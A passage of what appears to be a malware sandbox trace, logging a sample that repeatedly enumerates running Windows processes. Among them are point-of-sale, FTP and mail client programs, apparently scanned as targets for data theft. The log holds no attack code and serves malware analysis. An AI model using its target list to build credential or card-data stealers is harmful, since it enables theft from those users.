cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0169.447] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0169.451] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0169.453] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0169.456] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0169.459] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0169.462] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0169.465] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0169.467] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0169.470] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0169.472] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0169.480] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0169.483] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0169.485] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0169.488] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0169.491] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0169.493] CloseHandle (hObject=0x2074) returned 1 [0169.493] Sleep (dwMilliseconds=0x64) [0169.635] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x13dc [0169.652] Process32First (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.654] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0169.656] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0169.657] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.659] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0169.661] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.663] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0169.665] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0169.667] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0169.669] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.670] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.823] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0169.826] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.828] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.830] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.833] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.835] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.839] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.842] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.844] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0169.846] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0169.849] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.851] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0169.853] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.856] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0169.909] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0169.911] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0169.914] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0169.916] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0169.918] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0169.920] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.923] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0169.937] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0169.941] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0169.943] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0169.946] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.949] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0169.951] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0169.953] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0169.956] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0170.004] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0170.006] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0170.009] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0170.011] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0170.014] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0170.016] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0170.018] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0170.020] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0170.023] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0170.025] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0170.027] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0170.030] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0170.033] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0170.035] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0170.037] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0170.047] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0170.050] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0170.053] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0170.056] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0170.059] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0170.062] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0170.065] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0170.068] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0170.071] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0170.074] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0170.077] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0170.080] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0170.086] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0170.089] Process32Next (in: hSnapshot=0x13dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 